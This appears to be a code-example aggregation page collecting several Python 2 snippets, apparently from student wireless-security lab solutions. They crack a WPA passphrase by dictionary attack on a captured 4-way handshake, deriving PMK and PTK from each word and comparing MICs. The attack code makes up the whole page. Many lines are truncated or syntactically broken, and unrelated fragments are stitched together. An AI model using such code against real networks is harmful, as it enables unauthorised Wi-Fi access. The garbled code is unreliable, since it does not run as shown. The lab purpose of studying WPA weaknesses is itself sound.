Beispiel #1
def bruteforceAttack(ssid, APmac, Clientmac, ANonce, SNonce, data, mic ,dico):

    # convert format
    APmac = a2b_hex(APmac)
    Clientmac = a2b_hex(Clientmac)
    ANonce = a2b_hex(ANonce)
    SNonce = a2b_hex(SNonce)
    data  = a2b_hex(data)

    A = "Pairwise key expansion" # needed for key derivation
    B = min(APmac,Clientmac)+max(APmac,Clientmac)+min(ANonce,SNonce)+max(ANonce,SNonce) #used in pseudo-random function

    #read worldlist by line -> onr word by line
        with open(dico, "r") as ins:
            for line in ins:
                line = line[:-1] # remove \n

                #calculate 4096 rounds to obtain the 256 bit (32 oct) PMK
                pmk = pbkdf2_hex(line, ssid, 4096, 32)

                #expand pmk to obtain PTK
                ptk = customPRF512(a2b_hex(pmk),A,B)

                #calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK
                mic =[0:16],data,hashlib.sha1)
                # check mic
                if str(info[5]) in mic.hexdigest():
                    print("Found right MIC: " + mic.hexdigest() + "\nPassphrase: " + line)
                    return line
        print("Could not open file")
def main():
    path = "./wordlist.txt"
    words = retrieveWord(path)

    # Read capture file -- it contains beacon, authentication, associacion, handshake and data
    wpa = rdpcap("wpa_handshake.cap")
    wpa_mic = wpa[8]

    # -4 for remove "WPA Key Data Length"
    # -36 Begin of "WPA Key MIC"
    # Take only MIC from the frame
    mic = wpa_mic.load.encode("hex")[-36:-4]
    ssid = wpa[3].info  # like the previous lab

    # Original Data
    data = a2b_hex(

    # Labinot : These are management frames, so ToDS and FromDS = 0
    APmac = a2b_hex(wpa[0].addr2.replace(":", ""))
    Clientmac = a2b_hex(wpa[1].addr1.replace(":", ""))

    # Authenticator and Supplicant Nonces

    # Labinot : To have all the information from a packet, it is possible to do ".show()" on the packet
    #           The load field contains the data in binary, the 13th byte is the beginning of the nonce (wich is 32 bytes long)
    #			It is possible to make an .encode("hex") to have a better view of the information
    ANonce = (wpa[5].load)[13:45]
    SNonce = (wpa[6].load)[13:45]

    A = "Pairwise key expansion"
    B = min(APmac, Clientmac)+max(APmac, Clientmac)+min(ANonce, SNonce) + \
        max(ANonce, SNonce)  # used in pseudo-random function

    for word in words:
        pmk = pbkdf2_hex(word, ssid, 4096, 32)
        #expand pmk to obtain PTK
        ptk = customPRF512(a2b_hex(pmk), A, B)
        #calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK
        generatateMIC =[0:16], data, hashlib.sha1)

        # [-8] to remove ICV part
        if str(generatateMIC.hexdigest()[:-8]) == str(mic):
Beispiel #3
def generateMic(passPhrase):
	This function generate a mic from a passphrase.

    #calculate 4096 rounds to obtain the 256 bit (32 oct) PMK
    pmk = pbkdf2_hex(passPhrase, ssid, 4096, 32)

    #expand pmk to obtain PTK
    ptk = customPRF512(a2b_hex(pmk), A, B)

    #calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK
    mic =[0:16], data, hashlib.sha1)

    mic = mic.hexdigest()[:32]

    return mic
B           = min(APmac,Clientmac)+max(APmac,Clientmac)+min(ANonce,SNonce)+max(ANonce,SNonce) #used in pseudo-random function

#data        = a2b_hex("0103005f02030a0000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000") 
#cf "Quelques détails importants" dans la donnée

print "\n\nValues used to derivate keys"
print "============================"
print "Passphrase: ",passPhrase,"\n"
print "SSID: ",ssid,"\n"
print "AP Mac: ",b2a_hex(APmac),"\n"
print "CLient Mac: ",b2a_hex(Clientmac),"\n"
print "AP Nonce: ",b2a_hex(ANonce),"\n"
print "Client Nonce: ",b2a_hex(SNonce),"\n"

#calculate 4096 rounds to obtain the 256 bit (32 oct) PMK
pmk = pbkdf2_hex(passPhrase, ssid, 4096, 32)

#expand pmk to obtain PTK
ptk = customPRF512(a2b_hex(pmk),A,B)

#calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK
mic =[0:16],data,hashlib.sha1)

print "\nResults of the key expansion"
print "============================="
print "PMK:\t\t",pmk,"\n"
print "PTK:\t\t",b2a_hex(ptk),"\n"
print "KCK:\t\t",b2a_hex(ptk[0:16]),"\n"
print "KEK:\t\t",b2a_hex(ptk[16:32]),"\n"
print "TK:\t\t",b2a_hex(ptk[32:48]),"\n"
Beispiel #5
# We recover it from the last frame of the handshake.
wantedMic = b2a_hex(wpa[8].load[77:93])

# To have the correct data, we must change the last bytes to remove the MIC and put '0' instead and add the version,
# type and data length in front of the payload in the last frame of the handshake.
version = hex(wpa[8][EAPOL].version)[2:].zfill(2)
type = hex(wpa[8][EAPOL].type)[2:].zfill(2)
len = hex(wpa[8][EAPOL].len)[2:].zfill(4)
data = a2b_hex(version + type + len + b2a_hex(wpa[8].load)[:140] + "0" * 50)

# Now that we have all the information, we can try to find it with a dictionary attack
dictPath = "./dict"
dictFile = open(dictPath)
currentWord = dictFile.readline()
while currentWord != "":
    currentWord = currentWord[:-1]
    pmk = pbkdf2_hex(currentWord, ssid, 4096, 32)

    # expand pmk to obtain PTK
    ptk = customPRF512(a2b_hex(pmk), A, B)
    print("The current tested word is : " + currentWord)
    # calculate our own MIC over EAPOL payload - The ptk is, in fact, KCK|KEK|TK|MICK
    mic =[0:16], data, hashlib.sha1)
    MIC_hex_truncated = mic.hexdigest()[0:32]
    # When the MICs are the same we print the word and quit the execution.
    if MIC_hex_truncated == wantedMic:
        print("Congratulations! " + currentWord + " is the passphrase!")
        print("+++" + currentWord + "+++")
    currentWord = dictFile.readline()
mic_to_test = b2a_hex(
    wpa[8].load)[154:186]  #we extract the mic in the 4th handshake

B = min(APmac, Clientmac) + max(APmac, Clientmac) + min(ANonce, SNonce) + max(
    ANonce, SNonce)  #used in pseudo-random function

data = a2b_hex(
)  #cf "Quelques détails importants" dans la donnée

dico = open("dico.txt")  #wordlist file
for word in dico:
    word = word[:-1]  #remove the \n

    #calculate 4096 rounds to obtain the 256 bit (32 oct) PMK
    pmk = pbkdf2_hex(word, ssid, 4096, 32)

    #expand pmk to obtain PTK
    ptk = customPRF512(a2b_hex(pmk), A, B)

    #calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK
    mic =[0:16], data, hashlib.sha1)

    if (mic.hexdigest()[:-8] == mic_to_test):

        print "============================"
        print "Passphrase: ", word, "\n"
        print "MIC:\t\t", mic.hexdigest(), "\n"
    blen = 64
    i = 0
    R = ''
    while i <= ((blen * 8 + 159) / 160):
        hmacsha1 =, A + chr(0x00) + B + chr(i), hashlib.sha1)
        i += 1
        R = R + hmacsha1.digest()
    return R[:blen]

wpa = rdpcap('wpa_handshake.cap')

#open and read the dictionary and put lines in an array
#source :
dictionary = open('dictionary.txt', 'r')

words =

nbRounds = 4096
sizePMK = 32

ssid = wpa[0].info
ssidLen = len(ssid)

print ssid
print ssidLen

for passphrase in words:
    pmk = pbkdf2_hex(passphrase, ssid, nbRounds, sizePMK)
    print pmk
# Take a good look at the contents of this variable. Compare it to the Wireshark last message of the 4-way handshake.
# In particular, look at the last 16 bytes. Read "Important info" in the lab assignment for explanation

# RecOnstruct the data mandatory for MIC computing
data = format(ea.version, "#02").decode("hex") + format(
    ea.type, "#02").decode("hex") + hex(
        ea.len)[2:].zfill(4).decode("hex") + wpa[8].load[:-36] + '\x00' * 36

#open the dictionnary
with open('test.txt') as topo_file:
    for line in topo_file:
        # delete the \n character
        line = line[:-1]
        print line + '\n'
        #calculate 4096 rounds to obtain the 256 bit (32 oct) PMK
        pmk = pbkdf2_hex(line, ssid, 4096, 32)

        #expand pmk to obtain PTK
        ptk = customPRF512(a2b_hex(pmk), A, B)

        #calculate our own MIC over EAPOL payload - The ptk is, in fact, KCK|KEK|TK|MICK
        mic =[0:16], data, hashlib.sha1)
        mic = mic.hexdigest()[0:32]
        # if the MIC is similar, the password is found
        if mic == mic_to_test:
            print "The password is " + line

print "\n\nValues used to derivate keys"
print "============================"
print "SSID: ", ssid, "\n"
def customPRF512(key, A, B):
    This function calculates the key expansion from the 256 bit PMK to the 512 bit PTK
    blen = 64
    i = 0
    R = ''
    while i <= ((blen * 8 + 159) / 160):
        hmacsha1 =, A + chr(0x00) + B + chr(i), hashlib.sha1)
        i += 1
        R = R + hmacsha1.digest()
    return R[:blen]

print "Actual mic: ", str(mic)

for word in words:
    #calculate 4096 rounds to obtain the 256 bit (32 oct) PMK
    pmk = pbkdf2_hex(word.rstrip(), ssid, 4096, 32)

    #expand pmk to obtain PTK
    ptk = customPRF512(a2b_hex(pmk), A, B)

    #calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK
    computed_mic =[0:16], data, hashlib.sha1)

    if str(computed_mic.hexdigest()[:-8]) == str(mic):
        print "Mic found: ", computed_mic.hexdigest()[:-8]
        print "Passphrase: ", word
Beispiel #10
def findPassphrase(givenPass):
    # Read capture file -- it contains beacon, authentication, associacion, handshake and data
    wpa = rdpcap("wpa_handshake.cap")

    # Important parameters for key derivation - most of them can be obtained from the pcap file
    passPhrase = givenPass.replace(
        "\n", "")  #We get rid of the \n given by the read of the file
    A = "Pairwise key expansion"  #this string is used in the pseudo-random function
    ssid = wpa[0].info
    APmac = a2b_hex(wpa[0].addr2.replace(":", ""))
    Clientmac = a2b_hex(wpa[1].addr1.replace(":", ""))

    # Authenticator and Supplicant Nonces
    # All are extracted from Raw data of the pcap
    ANonce = wpa[5].load[13:45]
    SNonce = wpa[6].load[13:45]

    # This is the MIC contained in the 4th frame of the 4-way handshake
    # When attacking WPA, we would compare it to our own MIC calculated using passphrases from a dictionary
    mic_to_test = wpa[8].load[77:93]

    B = min(APmac, Clientmac) + max(APmac, Clientmac) + min(
        ANonce, SNonce) + max(ANonce, SNonce)  #used in pseudo-random function

    data = '{:02X}'.format(wpa[8][EAPOL].version, 'x') + '{:02X}'.format(
        wpa[8][EAPOL].type, 'x') + '{:04X}'.format(
            wpa[8][EAPOL].len, 'x') + b2a_hex(wpa[8].load[:-18]) + b2a_hex(
                "\x00" * 18)
    data = a2b_hex(
    )  #we encode the data to binary in order to be used in mic calculation

    print "\n\nValues used to derivate keys"
    print "============================"
    print "Passphrase: ", passPhrase, "\n"
    print "SSID: ", ssid, "\n"
    print "AP Mac: ", b2a_hex(APmac), "\n"
    print "CLient Mac: ", b2a_hex(Clientmac), "\n"
    print "AP Nonce: ", b2a_hex(ANonce), "\n"
    print "Client Nonce: ", b2a_hex(SNonce), "\n"

    #calculate 4096 rounds to obtain the 256 bit (32 oct) PMK
    pmk = pbkdf2_hex(passPhrase, ssid, 4096, 32)

    #expand pmk to obtain PTK
    ptk = customPRF512(a2b_hex(pmk), A, B)

    #calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK
    mic =[0:16], data, hashlib.sha1)

    print "\nResults of the key expansion"
    print "============================="
    print "PMK:\t\t", pmk, "\n"
    print "PTK:\t\t", b2a_hex(ptk), "\n"
    print "KCK:\t\t", b2a_hex(ptk[0:16]), "\n"
    print "KEK:\t\t", b2a_hex(ptk[16:32]), "\n"
    print "TK:\t\t", b2a_hex(ptk[32:48]), "\n"
    print "MICK:\t\t", b2a_hex(ptk[48:64]), "\n"
    print "MIC:\t\t", mic.hexdigest()[:32], "\n"

    print "MIC_wanted:\t", (b2a_hex(mic_to_test)), "\n"

    if (mic.hexdigest()[:32] == b2a_hex(mic_to_test)):
        print "The passphrase used  : ", givenPass
        return True

    return False
def calcMIC(wpa, passPhrase):
    # Important parameters for key derivation - some of them can be obtained from the pcap file
    #passPhrase  = "actuelle" #this is the passphrase of the WPA network
    A = "Pairwise key expansion"  #this string is used in the pseudo-random function and should never be modified
    ssid = wpa[0].info  #"SWI"
    APmac = a2b_hex("".join(wpa[1].addr2.split(
        ":")))  #a2b_hex("cebcc8fdcab7") #MAC address of the AP
    Clientmac = a2b_hex("".join(wpa[1].addr1.split(
        ":")))  #a2b_hex("0013efd015bd") #MAC address of the client

    # Authenticator and Supplicant Nonces
    ANonce = wpa[5].load[
        45]  #a2b_hex("90773b9a9661fee1f406e8989c912b45b029c652224e8b561417672ca7e0fd91")
    SNonce = wpa[6].load[
        45]  #a2b_hex("7b3826876d14ff301aee7c1072b5e9091e21169841bce9ae8a3f24628f264577")

    # This is the MIC contained in the 4th frame of the 4-way handshake. I copied it by hand.
    # When trying to crack the WPA passphrase, we will compare it to our own MIC calculated using passphrases from a dictionary
    mic_to_test = b2a_hex(
        wpa[8].load[-18:-2])  #"36eef66540fa801ceee2fea9b7929b40"

    B = min(APmac, Clientmac) + max(APmac, Clientmac) + min(
        ANonce, SNonce) + max(ANonce, SNonce)  #used in pseudo-random function

    # Take a good look at the contents of this variable. Compare it to the Wireshark last message of the 4-way handshake.
    # In particular, look at the last 16 bytes. Read "Important info" in the lab assignment for explanation
    data = str(
    )  #a2b_hex("0103005f02030a0000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
    data = data[:-18] + data[-34:-18] + data[-2:]
	print "original data:", "0103005f02030a0000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
	print "our data:     ", b2a_hex(data)
	print "\n\nValues used to derivate keys"
	print "============================"
	print "Passphrase: ",passPhrase,"\n"
	print "SSID: ",ssid,"\n"
	print "AP Mac: ",b2a_hex(APmac),"\n"
	print "CLient Mac: ",b2a_hex(Clientmac),"\n"
	print "AP Nonce: ",b2a_hex(ANonce),"\n"
	print "Client Nonce: ",b2a_hex(SNonce),"\n"
    #calculate 4096 rounds to obtain the 256 bit (32 oct) PMK
    pmk = pbkdf2_hex(passPhrase, ssid, 4096, 32)

    #expand pmk to obtain PTK
    ptk = customPRF512(a2b_hex(pmk), A, B)

    #calculate our own MIC over EAPOL payload - The ptk is, in fact, KCK|KEK|TK|MICK
    mic =[0:16], data, hashlib.sha1)

    #separate ptk into different keys - represent in hex
    KCK = b2a_hex(ptk[0:16])
    KEK = b2a_hex(ptk[16:32])
    TK = b2a_hex(ptk[32:48])
    MICK = b2a_hex(ptk[48:64])

    #the MIC for the authentication is actually truncated to 16 bytes (32 chars). SHA-1 is 20 bytes long.
    MIC_hex_truncated = mic.hexdigest()[0:32]

    return MIC_hex_truncated